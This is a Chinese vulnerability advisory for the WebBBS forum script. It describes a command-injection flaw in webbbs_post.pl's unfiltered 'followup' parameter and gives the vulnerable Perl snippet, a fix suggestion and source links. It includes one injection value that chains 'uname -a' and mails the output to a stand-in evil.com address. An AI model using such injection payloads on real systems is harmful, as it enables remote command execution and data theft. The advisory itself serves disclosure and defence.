添加时间:
2005-08-13

系统编号:
WAVDB-00229
BUGTRAQ: 5048

影响版本:
WebBBS 5.0-4.0

程序介绍:

WebBBS是一款由Darryl Burgdorf维护的基于WEB的论坛程序，以简单文本文件存储信息。

漏洞分析:

WebBBS脚本对用户提交的输入缺少正确的过滤，远程攻击者可以利用这个漏洞以WEB进程的权限在系统上执行任意命令。

 

 WebBBS没有正确过滤来自CGI参数上的元字符，攻击者可以提交包含 ; 或者 | 等元字符来执行额外命令，问题存在于webbbs_post.pl脚本中：

 if ($FORM{'followup'}) { $followup = 
  $FORM{'followup'} ; } 
 ... 
 if ($followup) { 
 ... 
                 $subdir =  bbs .int($followup/1000); 
                 open 
 (FOLLOWUP, $dir/$subdir/$followup ); 
 ... 

 使用如 followup=10;uname -a|mail zlo@evil.com| 代替 followup=10 变量就可能以WEB权限在系统上执行任意命令。

解决方案:
临时解决方法：
如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁：
* 修改程序，严格过滤用户输入数据。

厂商补丁：
WebScripts
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://awsd.com/scripts/webbbs/

信息来源:
<*来源：nerf gr0up nerf （vipersv@mail.ru）
链接：http://archives.neohapsis.com/archives/bugtraq/2002-06/0217.html
*>